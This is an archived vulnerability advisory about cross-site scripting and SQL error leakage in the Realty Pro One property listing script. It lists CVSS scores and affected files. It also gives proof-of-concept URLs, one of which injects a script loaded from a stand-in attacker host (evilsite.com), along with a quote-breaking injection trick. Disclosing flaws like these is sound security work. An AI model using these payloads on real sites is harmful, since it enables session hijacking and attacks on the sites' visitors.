Realty Pro One Property Listing Script

2006-05-30 / 2006-05-31
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Realty Pro One http://realtypro1.2run2.com/index.php Description: Realty Pro One is a powerful property listing tool with many features. Effected files: searchlookup.php images.php index_other.php request_info.php ?listingid Exploits & Vulns: XSS Vulnerability by the listingid variable: http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite .com/xss.js></SCRIPT> Also outputs SQL Query error msg: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re More XSS Vulnerabilities: http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS] http://www.example.com/images.php?id=[XSS] http://www.example.com/listings/index_other.php?listingid=[XSS] By putting "> and <" infront and behind our script tags: http://www.example.com/listings/request_info.php?agentid=101005">[XSS]<" &listtype=homes&listingid=222003 No version # for this script was given on the website.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top